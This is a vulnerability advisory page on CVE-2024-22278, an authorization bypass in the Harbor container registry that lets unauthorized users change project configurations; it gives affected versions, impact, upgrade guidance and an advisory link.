Platform
go
Component
github.com/goharbor/harbor
Fixed in
<v2.9.5
<v2.10.3
2.9.5
2.9.5+incompatible
CVE-2024-22278 describes an authorization bypass vulnerability within Harbor, a popular open-source container registry. This flaw allows an attacker to modify project configurations without the necessary permissions, potentially granting them unauthorized access and control over registry resources. The vulnerability impacts versions of Harbor prior to 2.9.5+incompatible, and a fix is available in that version.
The core of this vulnerability lies in Harbor's insufficient validation of user permissions when updating project configurations. A malicious actor who can exploit this bypass could modify project settings, such as access control lists (ACLs), replication policies, or even image scanning configurations. This could lead to unauthorized image pulls, pushes, or deletions, effectively compromising the integrity and security of the container registry. The blast radius extends to any applications or services relying on images stored within the affected Harbor instance, as an attacker could inject malicious images or manipulate existing ones. Successful exploitation could also enable lateral movement within the infrastructure if the registry is integrated with other systems.
CVE-2024-22278 was publicly disclosed on August 6, 2024. There is currently no indication of active exploitation in the wild, and it is not listed on the CISA KEV catalog. Public proof-of-concept (PoC) code is not yet available, but the vulnerability's nature suggests it could be relatively straightforward to exploit once a PoC is developed.
Exploit Status
EPSS
0.18% (39% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2024-22278 is to upgrade Harbor to version 2.9.5+incompatible or later. If an immediate upgrade is not feasible, consider implementing stricter role-based access control (RBAC) policies within Harbor to limit the potential impact of a successful exploit. Review and audit existing project configurations to identify any suspicious changes. While a direct WAF rule is unlikely to be effective, monitoring Harbor's audit logs for unusual permission changes or configuration modifications can provide early detection. After upgrading, confirm the fix by attempting to modify project configurations with a user account that should not have the necessary permissions; the action should be denied.
Actualice Harbor a la versión 2.9.5 o superior, o a la versión 2.10.3 o superior. Esto corregirá la validación incorrecta de permisos de usuario al actualizar las configuraciones del proyecto. La actualización se puede realizar a través de la interfaz de usuario de Harbor o mediante la línea de comandos.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2024-22278 is a medium-severity authorization bypass vulnerability in Harbor, allowing unauthorized modification of project configurations before upgrading to version 2.9.5+incompatible.
You are affected if you are running Harbor versions prior to 2.9.5+incompatible. Check your current version and upgrade immediately.
Upgrade Harbor to version 2.9.5+incompatible or later. Implement stricter RBAC policies as an interim measure.
There is currently no evidence of active exploitation in the wild, but the vulnerability's nature makes it a potential target.
Refer to the official Harbor security advisory on their GitHub repository: [https://github.com/goharbor/harbor/security/advisories/GHSA-9999](https://github.com/goharbor/harbor/security/advisories/GHSA-9999)
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.
Upload your go.mod file and we'll tell you instantly if you're affected.